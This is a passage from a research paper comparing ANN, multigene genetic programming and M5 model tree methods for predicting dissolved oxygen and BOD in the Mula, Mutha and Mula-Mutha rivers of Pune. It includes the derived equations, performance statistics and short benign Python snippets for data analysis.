selected, and the selected points are exchanged. This evolution step is iterated until the termination criterion is met, enhancing the fitness of the models produced. The maximum number of genes (trees) in an individual, as well as the maximum tree depth, has a direct impact on the size of the search space and the number of solutions examined inside it; the success of the MGGP algorithm often rises when these parameters are increased. Finally, as a number of output models are generated, the best model is selected on the basis of simplicity as well as the greatest fitness value. The user may adjust the simplicity of the model through parameter settings (e.g., maximum tree depth or number of genes). Fig. S4 shows a typical MGGP model generated by two traditional GP trees.
This model predicts an output variable using the input variables x1, x2 and x3. The model structure contains nonlinear terms (e.g., sin, cos, sqrt) although it is linear in the parameters with respect to the coefficients d0, d1 and d2. The function set contains the basic arithmetic operators (+, ×, −, √, /, etc.) and nonlinear functions (sin, cos, tanh, etc.). It is relevant to note that the maximum permissible number of genes (Gmax) for a model and the maximum tree depth (Dmax) are specified by the user to have control over the complexity of the generated model. The evolved models are linear combinations of low-order nonlinear transformations of the predictor variables. For details of GP readers are referred to [33], and for MGGP to [17].

### 3. Study Area

The study area considered in this work is Pune City, situated in Maharashtra, India. Pune is the 8th largest city in India, located on the banks of two rivers, the Mula and the Mutha. The combined Mula-Mutha river flows through the city of Pune after their confluence at Sangamwadi (refer to Fig. S5). The Mula river travels a distance of about 64 km from its origin in the hilly areas of Pune District, of which 40 km is hilly terrain. It enters Pune city at upstream Balewadi (latitude 18°34′23.17″, longitude 73°51′47.6″) and flows through populated areas of Pune such as Pimple Gaurav and Vishrant Wadi before meeting the Mutha at downstream Sangamwadi (latitude 18°32′16.6″, longitude 73°45′38.6″). Several villages and small-scale industries like paper mills and sugar mills lie along the banks of the Mula River within the Pune Metropolitan Region and are responsible for generating waste in the river. The Mula river also receives waste from agricultural runoff (EIA report; PMC 2018). The Mutha River originates in the Western Ghats and flows eastward for about 14 km till it merges with the Mula River in the city of Pune. Many villages and old city areas lie along the Mutha River within the Pune Metropolitan Region. After merging with the Mula River in Pune, it flows downstream as the Mula-Mutha River to join the Bhima River, a major tributary of the Krishna River flowing southeast. The Mula-Mutha River is the most polluted, as it receives wastewater from various sewage treatment plants as well as common effluent treatment plants (CPCB Report 2019). For the development of the BOD and DO models, the water quality data were collected in proportion to the length of each stretch: the Mula River (30 km), the Mutha River (14 km), and the Mula-Mutha River (25 km) are of different lengths. Moreover, the deviation in the number of data points with respect to the stretch is not more than 10%. The data for the Mula-Mutha River were received from Nashik Hydro Works, Maharashtra, India for 2003 to 2018 (Water Resources Department, Government of Maharashtra, www.mahahp.gov.in).

### 4. Water Quality Data Set

The water quality data set required for the current study was collected from Hydro Nashik, Maharashtra, India [www.mahahp.gov.in]. River quality parameters are greatly influenced by anthropogenic activities, usually coupled with nonlinear and complex biochemical processes. Biochemical oxygen demand (BOD) and dissolved oxygen (DO) are influenced by factors like total solids (TS), alkalinity (Alk.), nitrite (No3-N), pH, electrical conductivity (EC), water temperature (Temp.), etc. [10].
To select input parameters for the DO and BOD models, it is necessary to understand the relationship of these parameters with DO and BOD. Salts and other inorganic chemicals dissolve in water and break into tiny electrically charged particles called ions, thus increasing the electrical conductivity (EC), i.e., the ability of the water to conduct electricity, while decreasing the potential of oxygen to dissolve in the water [35]. Similarly, an increase in salt (alkalinity) content leading to a high amount of total dissolved solids (TDS) results in a lower amount of atmospheric oxygen getting dissolved in the river water stream. As discussed in the earlier section, biochemical oxygen demand is a measure of the biodegradable organic matter present in the water sample, expressed in terms of the DO required to oxidize it; hence the amount of DO directly influences the BOD content. Nitrite is extremely toxic to aquatic life, but it rapidly oxidizes to nitrate (No3-No2), which is responsible for the growth of water hyacinth covering the surface of the river, making it difficult for sunlight to reach beneath the water surface, decreasing the rate of aeration and, in turn, increasing the DO demand [36]. pH is another important water quality parameter, controlled by inter-related chemical reactions that produce or consume hydrogen ions. A low pH indicates a high concentration of hydrogen ions or increased bacterial activity for organic matter decomposition, i.e., low BOD and DO, while a high pH increases the solubility of phosphorus and nitrates, making them more accessible for plant growth and increasing the demand for dissolved oxygen, which ultimately increases the BOD content [37, 38]. Water temperature (Temp.) is a controlling factor for aquatic life: it controls the rate of metabolic and reproductive activities and, therefore, life cycles. If the stream temperature increases, decreases, or fluctuates too widely, metabolic activity fluctuates as well, and the rate of decomposition by microorganisms is hampered [39].
The statistical analysis of the data at the three reaches of the Mula, Mutha and Mula-Mutha rivers used in the present study is shown in Table S1, which includes the minimum (min), maximum (max), standard deviation (sd), mean and skewness coefficient. It is clear from Table S1 that the skewness coefficient (Csx) is quite low for most of the data sets, which is considered appropriate as a high skewness value has a negative impact on the performance of an ANN [40]. The DO and BOD concentrations range down to 0.0 mg/L and up to 48 mg/L respectively, which indicates that some samples fall below the minimum allowable values (CPCB, 2015). Tables S2 and S3 show the relationship of the input parameters with DO and BOD for all three stretches of the Mula-Mutha river system. For both the Mutha and Mula rivers, the major contributing parameters for DO are EC, TDS, TS, alkalinity, hardness, and pH. However, for the Mula-Mutha River a different pattern is observed, with pH, TDS, and No3-No2 as the main contributors, because No3-N rapidly oxidises to No3-No2, which is responsible for decreasing DO. A similar pattern is observed for BOD. Considering the literature, existing records, statistical analysis and correlation behavior, the water quality parameters selected for modelling DO are pH, electrical conductivity (EC), alkalinity (Alk.), total solids (TS), total dissolved solids (TDS), nitrite (No3-N) and temperature (Temp.), and the parameters selected for modelling BOD are dissolved oxygen (DO), pH, electrical conductivity (EC), alkalinity (Alk.), total solids (TS), total dissolved solids (TDS), and nitrite/nitrate (No3-N, No3-No2). To select suitable input parameters for model development, the correlations of DO and BOD with the other independent parameters were investigated. The correlation coefficient is a key indicator of the statistical distribution of the given data and is equal to the mean normalized standard deviation of the given data set [4]. A high value of correlation indicates better agreement between the variables. It is reflected in Tables S2 and S3 that the variability in samples between the Mula and Mutha is not large as compared to the combined Mula-Mutha. The variability among the samples might be due to climatic influences and different pollution trends in the study area. It can also be observed from Tables S2 and S3 that most of the parameters display a high correlation with DO as well as BOD for the Mula and Mutha stations separately, except temperature and nitrite, whereas for the combined Mula-Mutha station only pH, nitrate and dissolved solids reflect higher correlations. Nitrite is generated as an intermediate product during the biological oxidation of ammonia to nitrate; it is the least stable and is usually present in a much lower amount than nitrate, and thus its influence is seen to be less. Temperature has an inverse influence on DO, but the variation in temperature is not very high in the given data set (Table S1), which indicates that some other parameter, like suspended or dissolved solids, bacterial decomposition, or any other pollutant, is affecting the oxygen level adversely besides temperature; this can be clearly seen in Tables S2 and S3 [39].
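A correlation screen of the kind summarized in Tables S2 and S3 could be produced along the following lines. This is only a sketch: the file name and column names are placeholders, since the actual data set used in the study is not distributed with the paper.

```python
import pandas as pd

# Placeholder file and column names; the real data set is not distributed with the paper.
df = pd.read_csv("mula_mutha_water_quality.csv")
candidates = ["pH", "EC", "Alk", "TS", "TDS", "NO3_N", "Temp"]

# Pearson correlation of each candidate input with DO and BOD
corr_do = df[candidates + ["DO"]].corr()["DO"].drop("DO")
corr_bod = df[candidates + ["BOD"]].corr()["BOD"].drop("BOD")
print(pd.concat([corr_do.rename("r_with_DO"), corr_bod.rename("r_with_BOD")], axis=1))
```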
### 5. Model Development

In the present work, three sets of models have been developed using the ANN, MGGP and M5T techniques for the three stretches of the river, namely the Mula, Mutha and Mula-Mutha, flowing through the city of Pune, India. It can be seen from Fig. S5 that the Mula and Mutha rivers merge to form the Mula-Mutha River at Sangamwadi, Pune (Maharashtra). Considering the geographic location and flow of the rivers, the models are developed as shown in Table S4, with the set numbers and the input parameters considered for each stretch of the Mula, Mutha and combined Mula-Mutha River. The developed models are partitioned into three sets: in Set 1 and Set 2, DO and BOD respectively are predicted using various causative parameters as inputs, while in Set 3 BOD is predicted using the output (DO) of the Set 1 model as one of the key input parameters along with the other inputs, as seen in Table S4. For the determination of BOD, prior knowledge of the DO concentration in the water is required; thus an attempt is made in Set 3 to use the DO predicted in Set 1 to predict BOD.

Separate three-layered feed-forward back-propagation ANN models were trained to predict DO and BOD till a low error goal (mean squared error) was achieved. All the networks were trained using the Levenberg-Marquardt algorithm with the 'log-sigmoid' and 'purelin' transfer functions in the first and second layer, respectively. The data were normalized between 0 and 1. The model architecture consists of an input layer with 6 neurons or nodes, a hidden layer with a varying number (1 to 32) of neurons as shown in Table 1, and an output layer with a single neuron. The number of hidden neurons was fixed by trial and error, since the selection of an appropriate number of nodes in the hidden layer is a very important aspect: a larger number may result in overfitting, while a smaller number may not capture the information adequately [41]. For the Mula and Mutha stretches the optimum numbers of hidden neurons are 10 and 11 respectively; however, for the Mula-Mutha stretch the minimum mean square error (MSE) was achieved with 32 neurons. All models were trained till a low error goal was achieved, and their weights and biases were retained for testing on the remaining data sets. The ANN was trained in MATLAB 9.1 (2016) using the NN toolbox [42].

The MGGP models have been developed in the MATLAB 2016 environment with GPTIPS as the source code [32, 42]. The root mean square error (RMSE) function was employed for model calibration. To get the optimum MGGP model, various mathematical functions and arithmetic operators have been used. Population and generation reflect the program size and the number of levels of the algorithm used before the run terminates; the numbers of populations and generations often depend on the complexity of the problem. However, most of the settings used to get the optimum model were based on experience with the predictive modeling of other data sets of similar size. The maximum number of genes and the tree depth directly influence the search space and the number of solutions explored within it [17]. The best performing MGGP models have been chosen on the basis of simplicity, i.e., less complexity, and the best fitness value for both the calibration and testing data sets [33]. Complexity of a model can also be judged by the Pareto chart, which represents all the generated models in terms of the complexity as well as the accuracy evolved; it can be controlled by defining the values for the maximum tree depth and the number of genes or trees. The MGGP algorithm was run several times with different combinations of population and generation till a satisfactory result for the optimal model was achieved. A population of 500 with 50 generations shows the best results as compared to other combinations for the Set 1 Mula River model, and a similar methodology was adopted for the Mutha and Mula-Mutha for all three sets. Table S5 gives the details of all the parameters used to model DO and BOD for each stretch.
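As a rough illustration of how such run settings (a population of 500 evolved over 50 generations, an RMSE fitness measure, and a restricted function set and tree depth) translate into code, the sketch below uses the open-source gplearn package. Note that gplearn implements standard single-tree GP symbolic regression, not the multigene GPTIPS variant used in this study, so it is only a stand-in, and all data here are random placeholders.

```python
import numpy as np
from gplearn.genetic import SymbolicRegressor

rng = np.random.default_rng(0)
X = rng.random((200, 6))            # placeholder inputs: pH, EC, Alk., TS, TDS, NO3-N (normalized)
y = rng.random(200)                 # placeholder target (DO); the study's data set is not public

# Standard single-tree GP as a stand-in for the multigene GPTIPS setup described above.
gp = SymbolicRegressor(
    population_size=500,            # population of 500 ...
    generations=50,                 # ... evolved over 50 generations, as in the Set 1 Mula run
    function_set=("add", "sub", "mul", "div", "sqrt", "sin", "cos"),
    init_depth=(2, 4),              # restrict tree depth to keep the evolved expression compact
    metric="rmse",                  # RMSE used as the fitness / calibration measure
    parsimony_coefficient=0.001,    # mild penalty on model complexity
    random_state=0,
)
gp.fit(X, y)
print(gp._program)                  # the evolved symbolic expression
```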
The M5 algorithm for MT was implemented using WEKA 3.9 [43]. To compare the performance of the models developed using the three techniques, the data division for training, validation and testing was kept the same: 70% for training, 15% for validation and 15% for testing. The performance of the models developed using ANN, M5T and MGGP has been assessed on unseen data, i.e., the testing data, by three statistical measures: root mean squared error (RMSE), mean absolute relative error (MARE) and coefficient of correlation (R). To identify the best model, the MARE and RMSE values should be as low as possible and R should be close to 1 [15]. The form of the output of the developed models is important for practical implementation. ANN presents the model in the form of trained weights and biases, MGGP in the form of a single equation, and M5T in the form of a series of linear equations. The MGGP technique is characterized by the property that parameters displaying significantly less or no influence are left out of the final equation. These forms of output can facilitate the use of these techniques for DO and BOD prediction on site and increase confidence in the same.
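For reference, the three error measures used to compare the models in Table 2 can be computed as in the sketch below, using their common definitions; the observed and predicted arrays are placeholders, not results from the study.

```python
import numpy as np

def rmse(obs, pred):
    # root mean squared error, in the units of the variable
    return np.sqrt(np.mean((obs - pred) ** 2))

def mare(obs, pred):
    # mean absolute relative error; assumes observed values are non-zero
    return np.mean(np.abs((obs - pred) / obs))

def corr_r(obs, pred):
    # Pearson coefficient of correlation between observed and predicted values
    return np.corrcoef(obs, pred)[0, 1]

obs = np.array([6.1, 5.4, 7.2, 4.8, 6.6])    # placeholder observed DO values (mg/L)
pred = np.array([5.9, 5.7, 7.0, 5.1, 6.4])   # placeholder model predictions
print(rmse(obs, pred), mare(obs, pred), corr_r(obs, pred))
```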
### 6. Results and Discussion

The results obtained from the three approaches ANN, MGGP and M5T for all models in the three sets for the rivers Mutha, Mula and Mula-Mutha, with the aim of predicting DO, BOD (with observed DO as one of the input parameters) and BOD (with modelled DO as one of the distinguishing input parameters), are presented in Table 2. It is evident from the results that ANN and MGGP show reasonable results for all three sets, and the models developed using ANN generally outperform the M5T and MGGP models. The performance of the individual sets is discussed separately in detail below.

### 6.1. DO Models

The working of an ANN model depends on how well the constructed model is trained and how the synaptic weights and biases are adapted to provide a meaningful output. ANN Model 1-1 has been developed with an architecture of 6:10:1, with 6 inputs (pH, EC, Alk., TS, TDS, No3-No2) and 1 output (DO), and the single hidden layer with 10 hidden neurons was trained till the lowest MSE was achieved. ANN Model 1-1 exhibited a reasonable performance, with a correlation between observed and predicted DO of 0.89 and a low RMSE of 0.61 mg/L (Table 2). A lower RMSE depicts a smaller spread of the residual error (between observed and predicted values), i.e., the standard deviation of the residuals, and can contribute towards a better performing ANN model. ANN Model 1-2, i.e., for the Mula river, resulted in a good performing model with R = 0.91, though with a higher RMSE of 0.98 as compared to ANN Model 1-1. A higher RMSE of 1.52 can be seen for Model 1-3 for the combined Mula-Mutha river. The larger RMSE is due to the larger deviation in the data, which indicates a larger spread of values as compared to the values for the Mutha and Mula individually. Being sensitive towards higher values, the MARE for Model 1-3 is also comparatively large (Table 2). The ANN output, in the form of weights and biases, can be analyzed further.

MGGP, the next technique utilized, presents the output in the form of a single equation-based model: it automatically evolves a mathematical expression in symbolic form, which can be analyzed further to find which variables affect the final prediction and in what manner, and this is the unique aspect of the technique [25]. MGGP develops expressional trees, as seen in Fig. S6 for model MGGP 1-2. The trees are combined using different weights for the genes. Table 3 summarizes the equations developed from the trees (genes) and the weight of each gene. The final solution is given by a linear sum of the gene outputs and a bias value, the weights of which are shown in Table 3 and displayed in Eq. 1. Using the least squares method, the weight related to each tree is determined by minimizing the goodness-of-fit error between the model and the training set [45].

##### (1)
DO = 0.0651 (Alk.) − 0.00326 (TS) + 0.0651 (pH) − 0.0651 (Alk.)^1/2 − 0.00326 (EC)^3/2 + 2.98e−6 (EC)^5/2 − (0.00163 (TDS)(NO3-NO2))/(pH) + (0.0214 (EC)(TS)^1/2 (pH))/(Alk.) + 4.16

It can be seen from the above equation that the weighting coefficients for electrical conductivity and total solids are higher than those for the other parameters, which shows that these parameters are highly influential in the prediction of DO. This finding is in tune with fundamental knowledge of water quality in environmental studies [46]. Thus, it can be said that the data-driven MGGP technique has reasonably understood the underlying phenomenon of DO and the relation of the input parameters with the output. The same can also be seen from the input frequency chart shown in Fig. 1 below for the Mutha river, i.e., model 1-1. To identify the input variables that are significant to the output, a graphical input frequency analysis of a single model, or of a user-specified fraction of the population, is used [45]. A similar trend can be seen in the frequency analysis chart (not included here) for model MGGP 1-3, i.e., for the Mula-Mutha river. The chart in Fig. 1 depicts the higher contribution of EC, followed by alkalinity, No3-No2, total solids and the other parameters. This finding is consistent with the fundamental knowledge of DO stated in Section 4 [46]. The equations of each of the genes for model 1-2 are shown in Fig. S7. Of all the models in Set 1 developed using MGGP, models 1-1 and 1-3, i.e., for the Mutha river and the combined Mula-Mutha river, show the higher performance in terms of the lowest RMSE, while a higher RMSE is seen for model 1-2. Further, the MGGP technique evolves multiple model choices for the designer, and any single best model can be selected based on the application requirement with the help of the Pareto chart. The Pareto chart, as seen in Fig. S8 for MGGP Model 1-3, represents the population of all evolved models in terms of their complexity, i.e., number of nodes, as well as their accuracy (fitness). The generated models that perform comparatively well and have fewer nodes, or less complexity, than the best generated model in the population can be identified in this chart. The best model (high accuracy and low complexity) is highlighted with the red dot/circle. The Pareto models (green dots) are models that are not strongly dominated by other models in terms of fitness and complexity, while the non-Pareto models (blue dots) are dominated models [17, 25]. From the Pareto front (Fig. S8), the user can decide whether the incremental gain in performance is worth the associated model complexity [25].
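Because MGGP delivers the model as a single closed-form expression, it can be applied directly to new measurements. The sketch below evaluates the DO model by summing the four gene expressions and the bias listed in Table 3, assuming (as the text states) a plain linear combination of the gene outputs and the bias; the sample input values are placeholders, not observations from the study.

```python
def do_mggp(ec, ts, tds, alk, ph, no3_no2):
    # Gene expressions and bias taken from Table 3; assumed to combine as a plain sum.
    gene1 = 0.0214 * ec * ts**0.5 * ph / alk
    gene2 = -(0.00163 * (2.0 * ts * ph + tds * no3_no2 + 2.0 * ec**1.5 * ph)) / ph
    gene3 = 0.0651 * alk + 0.0651 * ph - 0.0651 * alk**0.5
    gene4 = 2.98e-6 * ec**2.5
    return 4.16 + gene1 + gene2 + gene3 + gene4

# Placeholder measurements, not taken from the paper's data set
print(do_mggp(ec=420.0, ts=380.0, tds=300.0, alk=150.0, ph=7.8, no3_no2=1.2))
```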
It can be seen that in models 1-1 and 1-3 all the parameters are retained in the equation, depicting their importance and respective contributions, as MGGP has the unique characteristic that parameters contributing significantly to the prediction are retained while the others are removed (as seen in the frequency analysis chart) in predicting DO [48]. Hence both models 1-1 and 1-3 have shown a higher performance and a good correlation of all parameters with DO and have thus been considered in the study. The Mula river model, i.e., Model 1-2, displays a lower performance, with a higher RMSE of 1.43 and MARE of 0.06. For Model 1-2, the alkalinity and pH parameters are not considered in its equation, which might be the reason for the lower performance, as alkalinity shows a good correlation with DO.

The next technique in discussion is M5T, which works with the underlying principle of divide and conquer. Fig. S9 shows a typical model tree developed using the M5 algorithm for model MT 1-1, with the linear regression equations developed.

#### Linear equations developed for M5T Model 1-1

##### (2)
LM1: DO = −0.0028 (EC) − 0.0254 (Alk.) + 0.0035 (TS) − 0.0053 (TDS) + 0.1527 (pH) + 0.1088 (Temp.) + 4.0976

##### (3)
LM2: DO = −0.0028 (EC) − 0.0093 (Alk.) + 0.0035 (TS) − 0.0052 (TDS) + 0.1527 (pH) + 0.023 (Temp.) + 6.0998

##### (4)
LM3: DO = −0.0048 (EC) − 0.0041 (Alk.) + 0.0036 (TS) + 0.2609 (pH) + 1.7089

The tree in Fig. S9 shows the linear models (LM1–LM3) at the different leaf nodes. The first number in the bracket shows the number of samples in the sorted subset at the node, and the second number is the root mean square error (RMSE) of the corresponding linear model divided by the standard deviation of the sample subset, expressed as a percentage [25]. The linear equations developed for M5T Model 1-1 using the M5 algorithm (Eq. 2–4) show negative coefficients for alkalinity, total dissolved solids and electrical conductivity, indicating that an increase in any of these impurities in the river decreases the DO content, which is in line with the theoretical understanding of the influence of these parameters on DO [46, 47]. Thus, it can be seen that M5T learns the underlying phenomenon reasonably well. The series of equations developed by MT makes it user friendly. The M5T models developed in Set 1 display a lower performance as compared to the models developed using ANN and MGGP: with higher RMSE and lower R, models M5T 1-1 and 1-3 show a lower performance. However, M5T 1-2 shows a good performance of R = 0.82 as compared to the M5T models for the Mutha and Mula-Mutha. A visual representation of the model performances, in the form of scatter plots for predicting DO using ANN, MGGP and M5T for Model 1-1 (Mutha), Model 1-2 (Mula) and Model 1-3 (Mula-Mutha), is shown in Fig. 2, S10, and S11 below. The scatter plots show a more balanced scatter for Model 1-2 than for Models 1-1 and 1-3. It is evident from Fig. 2, S10, and S11 that ANN Model 1-2 is able to predict high DO values but displays a low performance in the prediction of low DO values. As far as the lower values of DO are concerned, MGGP Model 1-2 predicts them better than ANN.
The M5T Model 1-2 results are slightly inferior to both ANN and MGGP. It can be observed from Table 2 that all three models for 1-2 show R within the 0.82–0.91 range, but ANN Model 1-2 has the minimum RMSE (0.98). The Mula-Mutha is one of the most polluted stretches, as it receives large amounts of waste from various sewage treatment plants as well as common effluent treatment plants; hence the data received from this stretch reflect variation in terms of the influencing parameters. Table S2 shows that electrical conductivity, alkalinity and total solids have strong correlations with DO for the Mula and Mutha rivers (−0.90, −0.83, −0.84 and −0.87, −0.83, −0.81, respectively), while the same parameters show the least correlation with DO for the Mula-Mutha river (0.016, −0.266, 0.128). It can be observed from the scatter plot shown in Fig. S10 that MGGP Model 1-3 and ANN Model 1-3 are in better agreement with the measured values compared to the M5T model. Moreover, the RMSE value for MGGP Model 1-3 is lower (0.08) as compared to ANN Model 1-3 and M5T Model 1-3. Perhaps the MGGP approach of rejecting input parameters that do not participate effectively in the model makes it possible to select the correct parameters, which is reflected in the better fitness measures.

### 6.2. BOD Model Using Observed DO along with Other Input Parameters

The Set 2 models were designed to predict BOD using the observed DO values as an input parameter along with the other parameters (pH, EC, Alk., TS, TDS, No3-N), as seen in Table S4. The results of these models are then compared with the models of Set 3, in which BOD was predicted using modelled DO. This throws light on the efficacy of the models by virtue of the comparison between the BOD models developed with modelled DO and with observed DO. ANN builds an approximate function that maps a list of inputs to the desired outputs; in the process, it adjusts the weights and biases to reach the expected goal, which makes ANN a flexible approach and can contribute towards better performance [29]. In Set 2, the model developed using ANN for the Mutha river (ANN 2-1) displays a good performance with R = 0.91 and a low RMSE of 0.12, whereas Model 2-3 (i.e., for the Mula-Mutha river) shows a lower performance of R = 0.89. Apart from ANN being a good technique for mapping input and output parameters, the statistical properties of the output, i.e., BOD, also play a major role. The standard deviation of the BOD values in model 2-2 (6.8) is less than that in models 2-1 (9.5) and 2-3 (9.53), which indicates a smaller spread of values and thus contributes towards better performance in terms of R (0.92). The MGGP approach presents the output in the form of a standalone equation. The equation developed for Model 2-1 (i.e., for the Mutha river) is shown in Eq. 5.

##### (5)
BOD = 1.22e−4 (EC)^2 (Alk.)^2 (DO) + (No3-N)^1/2 − 13.4 tanh(DO)^4 (No3-N)^2 − 4.09e−6 (Alk.)(No3-N)(EC) + (No3-N) + (DO)(EC) + 4.04e−4 (DO)^2 (Alk.)(No3-N)^2 + 13.3

Eq. 5 displays higher coefficients towards DO, alkalinity content and nitrates. Fig. S12 for MGGP Model 2-1 confirms the same by displaying nitrate as an influential parameter, with dissolved oxygen being the most influential parameter followed by alkalinity, while total dissolved solids is the least influential parameter for BOD prediction. DO displays a high influence on BOD because it is the basic requirement for the reduction of BOD by oxidation of organic matter.
Similarly, an increase in alkalinity content leads to an increase in total dissolved solids, which directly increases the organic matter content, i.e., BOD [35], while nitrates are essential nutrients for plants and can cause plants and algae to grow rapidly in a river, leading to high BOD levels and depletion of oxygen [49]. The equation developed for the Mula river, i.e., model 2-2, is given in Eq. 6 below; it displays the contributions of DO, EC, TS, pH and No3-N.

##### (6)
BOD = 7.54 tanh(DO) − 1.0 (pH)^2 − 6.57e−5 ((EC) + (TS) + (No3-N)^2)^2 + 0.00129 (EC)(TS)^1/2 (No3-N) − (0.00402 (DO)(EC)(No3-N))/((DO) + 6.0)^1/2 − 4.91

Of all the MGGP models developed to predict BOD for the Mutha, Mula and Mula-Mutha rivers, the performance of the model for the Mutha river is good as compared to the other two in terms of higher R and lower RMSE (as seen in Table 2). In M5T, the input variable that maximizes the targeted error reduction is selected to split the data at a node, and the remaining variables are not considered in the developed equation [29]. The series of equations (two equations) developed for Model 2-1 using the model tree is shown in Eq. 7 and 8 below.

#### Linear equations developed for M5T Model 2-1

##### (7)
LM-1: BOD = −3.773 (DO) + 0.0055 (Alk.) − 0.0033 (TDS) + 20.537

##### (8)
LM-2: BOD = −0.4616 (DO) − 0.7109 (NO3-NO2) + 0.0146 (Alk.) − 0.0025 (TDS) + 6.2165

It is quite acceptable from the above equations developed by the model tree that DO shows negative coefficients, indicating its inverse relation with BOD, followed by a positive coefficient for alkalinity, indicating its direct relation, and similarly for nitrate as a parameter. The performance of M5T Model 2-3 in terms of R shows a similar value to ANN Model 2-3 (0.89, 0.88), though the RMSE is slightly on the higher side (1.97). Model MT 2-1 shows a slightly lower performance as compared to 2-3, while MT 2-2 shows a good performance for the Mula river. It is evident from Table 2 that ANN and MGGP both perform reasonably well in terms of low RMSE and high R for the Set 2 models. On the other hand, M5T shows a high correlation (R = 0.85) but the RMSE is on the higher side (≥2.12) too. ANN has a flexible approach, while in M5T the input variable that maximizes the targeted error reduction is selected to split the data at a node and the remaining variables are not considered in the developed equation [29]; this can reduce the performance of M5T as compared to ANN. A visual representation of the results in the form of scatter plots is shown in Fig. S13, 3, and S14 for the Set 2 models developed using ANN, MGGP and M5T. The scatter plots also confirm the above findings and display the better results of ANN and MGGP in terms of high R (0.91, 0.96) and low RMSE values (0.12, 0.46 respectively), while M5T shows an R of 0.85 and an RMSE of 2.12 on the higher side. The scatter plot in Fig. 3 displays a better agreement between the predicted and measured values by ANN; moreover, high BOD values are also predicted well. Considering the RMSE, both ANN 2-2 and MGGP 2-2 showed low values (0.738 and 0.98 respectively). Table 2 and Fig. S12 reflect that MGGP performs better in terms of high R (0.96) and low RMSE (0.49).

### 6.3. BOD Model Using Modelled DO

The models in Set 3 consist of BOD models that use the output of the Set 1 models, i.e., the predicted DO, to get an insight into how well the predicted DO values, along with the other influencing parameters, are able to model BOD. As discussed in the earlier section, determination of DO in the laboratory is tedious work, and the results are subject to complicating factors, such as the unaccounted oxygen demand from algal respiration, leading to measurement error [4].
Thus, the basic aim behind the use of modelled DO is to achieve accuracy and save time. Along similar lines to the Set 1 DO models, the Set 2 and Set 3 models for BOD were calibrated and tested, and the ones having the minimum RMSE or the highest R were selected. It may be emphasized from Table 2 that all the results for BOD prediction in Set 3 depend on the accuracy of the DO prediction models in Set 1. Among the Set 3 models developed using ANN, Model 3-1 (i.e., for the Mutha river) outperforms ANN Model 3-2 (i.e., for the Mula river) and ANN Model 3-3 (i.e., for the Mula-Mutha river) in terms of R; however, the lower RMSE in models 3-2 and 3-3 (RMSE = 1.84 and 1.83 respectively) is promising, and a similar trend can also be seen in the MARE. The performance of these models shows a decreasing trend as compared to the models developed with observed DO (i.e., in Set 2). The models developed using MGGP for Set 3 show similar performances for models 3-1 and 3-2; however, a high RMSE can be seen in model 3-2. The increase in RMSE is due to the higher prediction of BOD for a few values, thus increasing the standard deviation. However, similar to the trend of results seen in the ANN models for Set 3, the performance of the MGGP 3-1 model in terms of R is better as compared to the other two models (as seen in Table 2). The frequency analysis chart for MGGP model 3-1 (i.e., for the Mutha river), shown in Fig. S15 below, emphasizes the highest contributions of TS, NO3-N and DO, followed by the other parameters. DO has a high influence in BOD prediction, which was also observed in Set 2 and can be seen in all the models in Set 3 as well. The set of equations developed for the Mutha river, i.e., for model 3-1 using MGGP, is shown in Table S6. The equation also shows higher coefficients for total solids, No3-N and DO. According to the fundamentals, this finding is also correct, since total solids reveal the existence of organic matter, which directly contributes to the increase in BOD, while the presence of nitrite demonstrates the breakdown of organic matter [46, 47]. The Model Tree technique for the Set 3 models for the Mutha, Mula and Mula-Mutha rivers shows a satisfactory performance, with a good performance of R = 0.81 for model 3-1 but with an RMSE of 1.54; models 3-2 and 3-3, however, show a higher RMSE (3.93 and 3.5 respectively). Fig. 4 shows the classifier tree for M5T model 3-1, and the linear equations (9–11) given by M5T for model 3-1 confirm that the model tree has not considered the most important attribute, DO, in the formation of the model, which can be attributed to the splitting criterion of M5T, which includes the parameters that contribute to minimizing the standard deviation while developing the tree.

#### Linear equations developed for M5T Model 3-1

##### (9)
LM1: BOD = 0.0032 (EC) + 0.0056 (TS) − 0.8806 (pH) + 0.2283 (No3-N) + 7.625

##### (10)
LM2: BOD = 0.0032 (EC) + 0.0056 (TS) − 0.8806 (pH) + 0.2283 (No3-N) + 8.105

##### (11)
LM3: BOD = 0.0064 (EC) + 0.0079 (TS) − 16.734 (pH) + 0.4618 (No3-N) + 106.16

The scatter plots shown in Fig. S16, S17, and 5 display under- and over-predictions, and this also confirms the lower performance of all the models in Set 3 as compared to the models in Set 2. However, in spite of the under- or over-predictions, the scatter is comparatively balanced. It can be seen from the scatter plots (Fig. S16) that ANN and MGGP outperform M5T. Fig. S15 displays the relatively higher contributions of dissolved oxygen, total solids and nitrite ions towards BOD prediction in MGGP 3-1, which is in tune with the domain knowledge [46]. It also signifies that the underlying phenomenon has been captured well by MGGP.
The performance of model 3-2 (i.e., for the Mula river) shows that both ANN and MGGP displayed satisfactory performance in terms of R (0.80); however, the M5T model 3-1 yielded the lowest RMSE (1.54). RMSE describes the difference between observed and predicted values in the units of the variable, and the degree to which the RMSE exceeds the mean absolute error is an indicator of the extent to which outliers exist in the data. It is also observed that a few values were over-predicted, which is acceptable in the case of BOD, because high BOD values indicate organic pollution in a river and a demand for treatment. Fig. 5 and Table 2 reflect the better performance of the models developed using MGGP and ANN for model 3-3 (i.e., for the Mula-Mutha river), with a correlation coefficient R of 0.8, while MGGP shows the lowest RMSE of 0.98 as compared to ANN and M5T. As discussed earlier, BOD prediction using computed DO is totally dependent on how well DO is predicted; for models 1-3 and 3-3 the MGGP models work better than the ANN and M5T models, though marginally. Furthermore, during the performance assessment of any model for its applicability in predicting BOD or DO, it is very important to know the distribution of the prediction error along with the average prediction error, which is evaluated by using the mean absolute relative error (MARE). On the basis of the MARE and RMSE index analysis, MGGP (0.02, 0.98) shows better results as compared to ANN (0.21, 1.83) and M5T (0.32, 3.5) for model 3-3.

### 7. Conclusion

In the present study, an attempt was made to develop models using ANN, MGGP and M5T for the prediction of two important water quality parameters, namely DO and BOD, for three stretches of river: the Mutha, Mula, and Mula-Mutha. It can be concluded that all the models performed reasonably well, except the model for the Mula-Mutha stretch. The models developed by ANN for Set 1 outperformed MGGP and M5T, with high R and lower RMSE values, owing to ANN's model-free nature and capability to map nonlinear input-output relationships. The MGGP models for Set 2 display a better performance for BOD than ANN, though marginally, by providing an R value of more than 0.90 for all the stretches of the river. The results of all three sets of models seem to be influenced by the variability in the data. However, it is to be noted that MGGP worked better than the M5T models in terms of RMSE and R values. The models prepared for BOD using modelled DO for all three stretches depend entirely on how well DO is predicted beforehand, and this approach provides more confidence to users in the development of such models. This study reflects that data-driven techniques like ANN, MGGP and M5T learn from the data provided in training and try to grasp the influencing parameters, which are in tune with fundamental knowledge of water quality in environmental engineering. The research also shows that all the models were unable to 